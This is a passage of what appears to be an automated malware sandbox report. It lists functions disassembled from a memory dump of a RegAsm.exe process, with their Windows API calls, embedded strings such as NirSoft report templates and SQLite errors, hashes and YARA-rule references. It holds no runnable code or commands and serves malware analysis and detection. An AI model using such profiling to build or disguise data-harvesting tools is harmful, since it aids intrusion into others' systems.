                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                          • memset.MSVCRT ref: 0040DA23
                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                          • String ID: caption
                                                          • API String ID: 973020956-4135340389
                                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                          Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$_snwprintf$wcscpy
                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                          • API String ID: 1283228442-2366825230
                                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                          Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wcschr.MSVCRT ref: 00413972
                                                          • wcscpy.MSVCRT ref: 00413982
                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                          • wcscpy.MSVCRT ref: 004139D1
                                                          • wcscat.MSVCRT ref: 004139DC
                                                          • memset.MSVCRT ref: 004139B8
                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                          • memset.MSVCRT ref: 00413A00
                                                          • memcpy.MSVCRT ref: 00413A1B
                                                          • wcscat.MSVCRT ref: 00413A27
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                          • String ID: \systemroot
                                                          • API String ID: 4173585201-1821301763
                                                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                          Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscpy
                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                          • API String ID: 1284135714-318151290
                                                          • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                          • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                          Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                          • memcpy.MSVCRT ref: 0040C11B
                                                          • strchr.MSVCRT ref: 0040C140
                                                          • strchr.MSVCRT ref: 0040C151
                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                          • memset.MSVCRT ref: 0040C17A
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                          • String ID: 4$h
                                                          • API String ID: 4019544885-1856150674
                                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                          Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                          • String ID: 0$6
                                                          • API String ID: 4066108131-3849865405
                                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                          Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 004082EF
                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                          • memset.MSVCRT ref: 00408362
                                                          • memset.MSVCRT ref: 00408377
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$ByteCharMultiWide
                                                          • String ID:
                                                          • API String ID: 290601579-0
                                                          • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                          • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                          Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$wcslen
                                                          • String ID:
                                                          • API String ID: 239872665-3916222277
                                                          • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                          • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                          Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                          • String ID: %s (%s)$YV@
                                                          • API String ID: 3979103747-598926743
                                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                          Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                          • API String ID: 2780580303-317687271
                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                          Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                          • String ID: Unknown Error$netmsg.dll
                                                          • API String ID: 2767993716-572158859
                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                          Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                          • API String ID: 3176057301-2039793938
                                                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                          Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • database %s is already in use, xrefs: 0042F6C5
                                                          • database is already attached, xrefs: 0042F721
                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                          • unable to open database: %s, xrefs: 0042F84E
                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                          • out of memory, xrefs: 0042F865
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpymemset
                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                          • API String ID: 1297977491-2001300268
                                                          • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                          • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                          Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                          • memcpy.MSVCRT ref: 0040EB80
                                                          • memcpy.MSVCRT ref: 0040EB94
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                          • String ID: ($d
                                                          • API String ID: 1140211610-1915259565
                                                          • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                          • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                          Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                          • String ID:
                                                          • API String ID: 3015003838-0
                                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                          Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                          • memset.MSVCRT ref: 00413ADC
                                                          • memset.MSVCRT ref: 00413AEC
                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                          • memset.MSVCRT ref: 00413BD7
                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                          • String ID: 3A
                                                          • API String ID: 3300951397-293699754
                                                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                          Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                          • memcpy.MSVCRT ref: 0040D24C
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                          • String ID: strings
                                                          • API String ID: 3166385802-3030018805
                                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                          Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 00411AF6
                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                          • wcscat.MSVCRT ref: 00411B2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                          • String ID: AE$.cfg$General$EA
                                                          • API String ID: 776488737-1622828088
                                                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                          Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0040D8BD
                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                          • memset.MSVCRT ref: 0040D906
                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                          • String ID: sysdatetimepick32
                                                          • API String ID: 1028950076-4169760276
                                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                          Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memset
                                                          • String ID: -journal$-wal
                                                          • API String ID: 438689982-2894717839
